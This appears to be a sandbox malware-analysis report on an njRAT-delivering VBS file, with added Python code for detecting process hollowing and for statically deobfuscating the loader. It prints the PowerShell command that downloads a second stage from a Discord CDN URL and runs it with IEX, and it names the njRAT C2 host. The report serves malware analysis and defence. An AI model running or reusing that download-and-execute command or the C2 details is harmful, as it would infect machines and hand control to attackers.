Analysis
max time kernel: 148s
max time network: 145s
platform: windows7_x64
resource: win7-en-20211014
submitted: 26-10-2021 13:09

Static task: static1
Behavioral task: behavioral1
  Sample: RFQ-474552121.vbs
  Resource: win7-en-20211014
Behavioral task: behavioral2
  Sample: RFQ-474552121.vbs
  Resource: win10-en-20210920
General
Target: RFQ-474552121.vbs
Size: 15KB
MD5: 147841ac2ca60229a754403fddad59ec
SHA1: 9de7705976aec4bedd6f8805065ac17be1282d75
SHA256: a88a9fc866e2da0a88fbbf44e23b39b3bb980135b0d1c1aafbbef87490c2f34c
SHA512: 92be569b47e9a8445bfb62b44b3bf3a1116b528520a958f037967f16a0746f9ff6c23ceab63c1d7159565e20656cdf193c768323efa0e151f407b9775516f4b4
Malware Config
Extracted family: njrat
Version: v2.0
Botnet / campaign ID: ------(XxX)------
C2: new.libya2020.com.ly:2020
Windows (unlabeled field in the extracted config)
reg_key: Windows (the Startup-folder shortcut dropped by update.exe is named Windows.lnk, matching this value)
splitter: |-F-|
Signatures
- Blocklisted process makes network request (1 IoC)
  powershell.exe (PID 1020), network flow 5
- Executes dropped EXE (2 IoCs)
  update.exe (PID 1536); update.exe (PID 1940)
- Drops startup file (1 IoC)
  update.exe created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk
- Loads dropped DLL (1 IoC)
  update.exe (PID 1536)
- Suspicious use of SetThreadContext (1 IoC)
  update.exe (PID 1536) set the thread context of update.exe (PID 1940). Together with the twelve WriteProcessMemory calls from 1536 into 1940 listed below, this is the process-hollowing (RunPE) pattern: the first update.exe starts a second copy of itself, writes the real payload into it and points a thread at the injected code. The 1940 memory dumps at the end of the report (a 56KB region at 0x400000, with the sandbox's mapping point at 0x40839E inside it) are that injected image.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's canned text calls this "likely ransomware behaviour", but the heuristic is generic: drive enumeration is also ordinary njRAT functionality (its file manager and removable-drive spreading), which fits the extracted njRAT config better than ransomware.
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  powershell.exe (PID 1020), three times
- Suspicious use of AdjustPrivilegeToken (18 IoCs)
  powershell.exe (PID 1020): SeDebugPrivilege
  update.exe (PID 1940): SeDebugPrivilege, followed by eight alternating pairs of Token 33 and SeIncBasePriorityPrivilege
- Suspicious use of WriteProcessMemory (22 IoCs)
  WScript.exe (PID 2004) wrote to powershell.exe (PID 1020): 3 times
  powershell.exe (PID 1020) wrote to update.exe (PID 1536): 7 times
  update.exe (PID 1536) wrote to update.exe (PID 1940): 12 times
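The Signatures above are raw API-call counts, and a parent writing into a child it has just created (WScript.exe into powershell.exe, powershell.exe into update.exe) is normal loader behaviour; what makes the 1536 -> 1940 pair hollowing is the SetThreadContext on top of the writes, plus the Startup-folder drop for persistence. The following is an added example, not part of the report or the sandbox's own rule set, that runs that correlation over a constructed event list modelled on this report (PIDs, images and parent/child relations are taken from the page; the event ordering and counts are illustrative):

```python
from collections import defaultdict

# Constructed API-call events modelled on the Signatures section above. PIDs, images and
# the parent/child relations match the report; the exact ordering and counts are illustrative.
EVENTS = [
    {"api": "CreateProcess",      "pid": 2004, "image": "WScript.exe",    "target": 1020, "target_image": "powershell.exe"},
    {"api": "WriteProcessMemory", "pid": 2004, "image": "WScript.exe",    "target": 1020},
    {"api": "CreateProcess",      "pid": 1020, "image": "powershell.exe", "target": 1536, "target_image": "update.exe"},
    {"api": "WriteProcessMemory", "pid": 1020, "image": "powershell.exe", "target": 1536},
    {"api": "CreateProcess",      "pid": 1536, "image": "update.exe",     "target": 1940, "target_image": "update.exe"},
    {"api": "WriteProcessMemory", "pid": 1536, "image": "update.exe",     "target": 1940},
    {"api": "WriteProcessMemory", "pid": 1536, "image": "update.exe",     "target": 1940},
    {"api": "SetThreadContext",   "pid": 1536, "image": "update.exe",     "target": 1940},
    {"api": "CreateFile",         "pid": 1940, "image": "update.exe",
     "path": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk"},
]

# Per-user Startup folder suffix, compared case-insensitively.
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"


def find_hollowing(events):
    """Flag (parent, child) pairs where the parent wrote into the child AND replaced a
    thread context there. A parent writing to a child it just created is normal (the
    report shows WScript -> powershell and powershell -> update.exe doing exactly that),
    so WriteProcessMemory on its own must not fire."""
    writes = defaultdict(int)
    ctx = set()
    images, child_image = {}, {}
    for e in events:
        images[e["pid"]] = e["image"]
        if e["api"] == "CreateProcess":
            child_image[e["target"]] = e["target_image"]
        elif e["api"] == "WriteProcessMemory":
            writes[(e["pid"], e["target"])] += 1
        elif e["api"] == "SetThreadContext":
            ctx.add((e["pid"], e["target"]))
    findings = []
    for parent, child in sorted(ctx):
        if writes[(parent, child)] == 0:
            continue
        findings.append({
            "parent": parent, "child": child, "writes": writes[(parent, child)],
            # the host is a copy of the injector itself, as update.exe does here
            "same_image": images.get(parent) == child_image.get(child),
        })
    return findings


def find_startup_drops(events):
    """Files created under the per-user Startup folder (the Windows.lnk persistence)."""
    return [e["path"] for e in events
            if e["api"] == "CreateFile" and STARTUP_DIR in e["path"].lower()]


def process_chain(events, pid):
    """Walk CreateProcess events from pid back to the root, oldest first."""
    parent_of = {e["target"]: e["pid"] for e in events if e["api"] == "CreateProcess"}
    images = {e["pid"]: e["image"] for e in events}
    images.update({e["target"]: e["target_image"] for e in events if e["api"] == "CreateProcess"})
    chain = [pid]
    while chain[-1] in parent_of:
        chain.append(parent_of[chain[-1]])
    return [f"{p}:{images[p]}" for p in reversed(chain)]


if __name__ == "__main__":
    for f in find_hollowing(EVENTS):
        print("hollowing:", f, "chain:", " -> ".join(process_chain(EVENTS, f["child"])))
    print("startup drops:", find_startup_drops(EVENTS))
```

Run against the constructed events it reports one hollowing finding (1536 -> 1940, same image) with the chain WScript.exe -> powershell.exe -> update.exe -> update.exe, and one Startup drop; the WScript.exe and powershell.exe writes do not fire because no SetThreadContext accompanies them.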
Processes
1. C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\RFQ-474552121.vbs"  (PID 2004)
   - Suspicious use of WriteProcessMemory
2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1020, child of 1)
   Command line as launched by the VBS:
   $NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); $Dont='adString(''https://cdn.discordapp.com/attachments/901770008810618905/902212483350147082/UPS.jpg'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X
   The obfuscation is only string splitting, .Replace() and backtick escapes (a backtick outside a string is PowerShell's escape character, so I`E`X is IEX). After the three Replace calls, the -Join and backtick removal, the joined text is:
   (New-Object Net.WebClient).DownloadString('https://cdn.discordapp.com/attachments/901770008810618905/902212483350147082/UPS.jpg')
   The first IEX runs that, downloading the next stage (served as a .jpg from the Discord CDN), and the pipe into the second IEX executes whatever came back. The downloaded stage is not captured in this report; what is observed is that powershell.exe goes on to start C:\Users\Public\update.exe.
   - Blocklisted process makes network request
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
3. C:\Users\Public\update.exe  (PID 1536, child of 2)
   - Executes dropped EXE
   - Loads dropped DLL
   - Suspicious use of SetThreadContext
   - Suspicious use of WriteProcessMemory
4. C:\Users\Public\update.exe  (PID 1940, child of 3; the hollowed copy that carries the njRAT payload and persistence)
   - Executes dropped EXE
   - Drops startup file
   - Suspicious use of AdjustPrivilegeToken
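Recovering the download URL from a loader like the one in process 2 should not require running it. The block below is an added example (not code from the report or the sandbox) that statically evaluates the three obfuscation primitives this command line uses: single-quoted literals with '' as the escaped quote, ordinal .Replace() calls, and -Join followed by backtick removal in the resulting code. The OBFUSCATED string is the command line copied from the process tree above; the regexes only understand the `$x = '<literal>'.Replace(...)` and `($a,$b -Join '')` shapes, which is what is needed here, not a general PowerShell parser.

```python
import re

# The obfuscated command line, copied from the powershell.exe entry in the process tree above.
OBFUSCATED = (
    "$NOTHING = '(N`e`uprWjOFkvkmXBfdt`.W`e'.Replace('uprWjOFkvkmXBfd','w-Object Ne');"
    "$alosh='bCxNDFdlAckIUgChpnlo'.Replace('xNDFdlAckIUgChp','lient).Dow'); "
    "$Dont='adString(''https://cdn.discordapp.com/attachments/901770008810618905/"
    "902212483350147082/UPS.jpg'')';"
    "$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X"
)

SQ = r"'(?:[^']|'')*'"   # a PowerShell single-quoted literal; '' inside it is one literal quote


def unquote(lit):
    """Value of a single-quoted PowerShell literal ('' is the only escape)."""
    return lit[1:-1].replace("''", "'")


def strip_backticks(code):
    """Drop backtick escapes outside single-quoted strings: I`E`X -> IEX, N`e`w -> New.
    Inside single quotes a backtick is an ordinary character and is kept."""
    out, in_str, i = [], False, 0
    while i < len(code):
        ch = code[i]
        if ch == "'":
            in_str = not in_str
        elif ch == "`" and not in_str and i + 1 < len(code):
            i += 1
            ch = code[i]
        out.append(ch)
        i += 1
    return "".join(out)


# $name = '<literal>'.Replace('<a>','<b>')...   (zero or more Replace calls)
ASSIGN = re.compile(r"\$(\w+)\s*=\s*(" + SQ + r")((?:\.Replace\(" + SQ + r"\s*,\s*" + SQ + r"\))*)", re.I)
REPLACE = re.compile(r"\.Replace\((" + SQ + r")\s*,\s*(" + SQ + r")\)", re.I)
# ($a,$b,$c -Join '<sep>')
JOIN = re.compile(r"\(\s*((?:\$\w+\s*,\s*)*\$\w+)\s*-Join\s*(" + SQ + r")\s*\)", re.I)
URL = re.compile(r"https?://[^\s'\"()]+")


def resolve_variables(script):
    """Statically evaluate the string-building assignments. .NET String.Replace(string, string)
    is an ordinal, case-sensitive replacement, which str.replace matches exactly."""
    env = {}
    for m in ASSIGN.finditer(script):
        value = unquote(m.group(2))
        for r in REPLACE.finditer(m.group(3)):
            value = value.replace(unquote(r.group(1)), unquote(r.group(2)))
        env[m.group(1)] = value
    return env


def resolve_join(script, env):
    """Concatenate the variables named in the -Join expression with its separator."""
    m = JOIN.search(script)
    if not m:
        return None
    names = [n.strip().lstrip("$") for n in m.group(1).split(",")]
    return unquote(m.group(2)).join(env[n] for n in names)


def deobfuscate(script):
    """Return (variables, second-stage code, urls found in it, whether IEX is used)."""
    env = resolve_variables(script)
    stage2 = resolve_join(script, env)
    if stage2 is not None:
        stage2 = strip_backticks(stage2)   # the joined text is fed to IEX, so it is code
    uses_iex = re.search(r"\bIEX\b|Invoke-Expression", strip_backticks(script), re.I) is not None
    return env, stage2, URL.findall(stage2 or ""), uses_iex


if __name__ == "__main__":
    env, code, urls, iex = deobfuscate(OBFUSCATED)
    print(code)
    print("urls:", urls, "iex:", iex)
```

Note that the literal backticks inside $NOTHING survive stage one (inside single quotes they are plain characters) and are only removed once the joined text is treated as code, which is exactly the order in which PowerShell itself resolves them; evaluating the backticks first would give the wrong answer.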
Downloads
C:\Users\Public\update.exe (listed four times in the report with identical hashes, once as \Users\Public\update.exe)
  MD5: 289bce792735d436f48355e55ea0276f
  SHA1: 1438cd6b0e96ee1b6d9d3d17e3bc0177c9034ed8
  SHA256: 78b5fb7cbde356e0620afee36e4908e1985fbe17aaf30eaa896ecdf7c5f10f0b
  SHA512: f7216462891aa8937a0d512f6219c0b180ff5582494d0a54b093ca7cc65ae75665a1d2f5faec6ff916fe8d79ee179ffd10ae432a1d8c8aa58c09f6c9c4e6bfa2
PID 2004 (WScript.exe)
  memory/2004-55-0x000007FEFBB91000-0x000007FEFBB93000-memory.dmp  8KB
PID 1020 (powershell.exe)
  memory/1020-56-0x0000000000000000-mapping.dmp
  memory/1020-58-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp  11.4MB
  memory/1020-59-0x0000000002800000-0x0000000002802000-memory.dmp  8KB
  memory/1020-60-0x0000000002802000-0x0000000002804000-memory.dmp  8KB
  memory/1020-61-0x0000000002804000-0x0000000002807000-memory.dmp  12KB
  memory/1020-62-0x000000001B750000-0x000000001BA4F000-memory.dmp  3.0MB
  memory/1020-63-0x000000000280B000-0x000000000282A000-memory.dmp  124KB
PID 1536 (update.exe, injector)
  memory/1536-64-0x0000000000000000-mapping.dmp
  memory/1536-67-0x0000000000910000-0x0000000000911000-memory.dmp  4KB
  memory/1536-69-0x0000000000250000-0x0000000000257000-memory.dmp  28KB
  memory/1536-70-0x0000000004A50000-0x0000000004A51000-memory.dmp  4KB
  memory/1536-71-0x0000000000960000-0x0000000000989000-memory.dmp  164KB
PID 1940 (update.exe, hollowed copy)
  memory/1940-73-0x0000000000400000-0x000000000040E000-memory.dmp  56KB
  memory/1940-74-0x0000000000400000-0x000000000040E000-memory.dmp  56KB
  memory/1940-75-0x0000000000400000-0x000000000040E000-memory.dmp  56KB
  memory/1940-76-0x0000000000400000-0x000000000040E000-memory.dmp  56KB
  memory/1940-77-0x0000000000400000-0x000000000040E000-memory.dmp  56KB
  memory/1940-78-0x000000000040839E-mapping.dmp
  memory/1940-80-0x0000000000400000-0x000000000040E000-memory.dmp  56KB
  memory/1940-82-0x0000000076231000-0x0000000076233000-memory.dmp  8KB
  memory/1940-83-0x00000000055F0000-0x00000000055F1000-memory.dmp  4KB
The six dumps of the same 56KB region at 0x400000 in PID 1940, with the mapping point 0x40839E inside it, are the image written into the hollowed process by PID 1536 (see the SetThreadContext and WriteProcessMemory signatures); 0x400000 is the default image base of a 32-bit executable. For a memory-resident njRAT config these PID 1940 dumps, not the on-disk update.exe, are the ones to extract from.